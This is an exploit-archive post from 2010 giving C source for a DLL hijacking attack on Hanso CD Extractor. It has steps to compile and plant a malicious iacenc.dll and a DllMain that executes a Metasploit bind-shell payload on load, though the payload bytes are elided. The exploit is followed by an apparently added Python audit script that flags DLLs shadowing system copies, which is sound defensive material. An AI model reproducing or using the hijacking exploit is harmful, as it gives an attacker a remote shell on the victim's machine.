
[local exploits] - Hanso CD Extractor DLL Hijacking Exploit

Posted on 20 October 2010

========================================
Hanso CD Extractor DLL Hijacking Exploit
========================================

/*
#Hanso CD Extractor DLL Hijacking Exploit ( iacenc.dll )
#Author : anT!-Tr0J4n
#Email : D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com
#Greetz : Dev-PoinT.com ~ inj3ct0r.com ~ All Dev-poinT members and my friends
#special thanks to : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member
#Home : www.Dev-PoinT.com $ http://inj3ct0r.com
#Software : http://www.hansotools.com/applications/hanso-cd-extractor.html
#Tested on: Windows XP sp3
==========================
[>>] Compile code as ( iacenc.dll )
[>>] Move DLL file to the directory where Hanso CD Extractor is installed
[>>] check the result --> 0wn33d
==========================
*/

#include <windows.h>
#define DllExport __declspec (dllexport)

/*
 * windows/shell_bind_tcp - 476 bytes
 * http://www.metasploit.com
 * Encoder: x86/shikata_ga_nai
 * LPORT=1313, RHOST=, EXITFUNC=process, InitialAutoRunScript=,
 * AutoRunScript=
 */
unsigned char buf[] = "...";  /* encoded payload byte string */

/* DllMain is called by the loader as soon as the host process maps the DLL. */
BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    int (*func)();
    func = (int (*)()) buf;   /* treat the byte array as a function */
    (int)(*func)();
    return 0;
}

# Inj3ct0r.com [2010-10-20]
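The post above depends on a DLL named `iacenc.dll` being loadable from the application's install directory, which the standard Windows DLL search order consults before the system directory. The following audit is an added example, not part of the original post: it reports DLLs in an install directory that share a name with a system DLL but differ in content, or that match a watchlist seeded with the name from this page. The function names, the watchlist and the sample files are assumptions constructed for illustration.

```python
import hashlib
import tempfile
from pathlib import Path

# Names flagged even when no system copy exists; iacenc.dll is the name this page uses.
WATCHLIST = {"iacenc.dll"}

def sha256(path):
    return hashlib.sha256(path.read_bytes()).hexdigest()

def audit_app_dir(app_dir, system_dir, watchlist=WATCHLIST):
    """Return findings for DLLs in app_dir that would be picked up ahead of,
    or instead of, a same-named DLL in system_dir."""
    system = {p.name.lower(): p for p in Path(system_dir).iterdir()
              if p.is_file() and p.suffix.lower() == ".dll"}
    findings = []
    for dll in sorted(Path(app_dir).iterdir(), key=lambda p: p.name.lower()):
        name = dll.name.lower()   # Windows file names are case-insensitive
        if not dll.is_file() or dll.suffix.lower() != ".dll":
            continue
        if name in system:
            # A byte-identical copy of the system DLL is treated as benign.
            if sha256(dll) == sha256(system[name]):
                continue
            reason = "shadows system DLL with different content"
        elif name in watchlist:
            reason = "watchlisted name present in application directory"
        else:
            continue
        findings.append({"file": dll.name, "reason": reason, "sha256": sha256(dll)})
    return findings

def demo():
    """Constructed sample layout: two temp directories stand in for the
    install directory and the system directory."""
    with tempfile.TemporaryDirectory() as root:
        app, sysdir = Path(root, "app"), Path(root, "system32")
        app.mkdir()
        sysdir.mkdir()
        (sysdir / "version.dll").write_bytes(b"system copy")
        (sysdir / "msvcrt.dll").write_bytes(b"runtime")
        (app / "VERSION.DLL").write_bytes(b"different bytes")  # shadowing copy
        (app / "msvcrt.dll").write_bytes(b"runtime")           # identical copy
        (app / "iacenc.dll").write_bytes(b"planted")           # watchlisted name
        (app / "codec_helper.dll").write_bytes(b"app's own")   # not reported
        return audit_app_dir(app, sysdir)

if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

On a real host, point `audit_app_dir` at the install directory and `%SystemRoot%\System32`, and treat each finding as a file to verify (signature, origin, write time) rather than as a verdict.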

 
